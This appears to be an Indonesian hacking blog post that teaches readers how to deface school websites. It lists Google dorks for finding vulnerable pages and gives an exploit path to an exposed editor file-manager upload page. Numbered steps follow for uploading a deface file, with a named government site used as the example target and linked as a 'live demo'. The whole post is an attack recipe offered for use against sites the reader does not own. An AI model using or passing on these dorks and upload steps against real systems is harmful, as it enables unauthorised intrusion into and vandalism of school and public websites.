» » Cara Deface Web Sekolah

Cara Deface Web Sekolah

Deface
Oke langsung saja ya kang ^_^

Dork :
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?

Exploit : /editor/filemanager/connectors/test.html

Caranya :
  1. Copy dork di atas ke kolom google 
  2. Pilih salah satu website dari sekian banyak website untuk di test
  3. Saya ambil contoh target ane http://www.tanjabbarkab.go.id/html/guru.php?id=profil&kode=53&profil=Pantun%20Daerah
  4. Ubah /html/guru.php?id=dbguru menjadi /editor/filemanager/connectors/test.html
  5. Jadi seperti ini http://www.tanjabbarkab.go.id/editor/filemanager/connectors/test.html
  6. Lalu ubah ASP menjadi PHP, lalu klik Telusuri. pilih script deface yang ingin di test
  7. Kemudian klik UPLOAD
  8. Untuk melihat hasil deface kita -> http://www.tanjabbarkab.go.id/userfiles/namafileanda.txt
  9. Ane mengambil target ini -> http://www.tanjabbarkab.go.id/userfiles/file/rakaganteng.txt
Screenshoot :  
















Bagaimana ? mudah bukan ? hehe. 
Semoga artikel ini bermanfaat buat akang akang semua ^_^
Live Demo -> http://www.tanjabbarkab.go.id/userfiles/file/rakaganteng.txt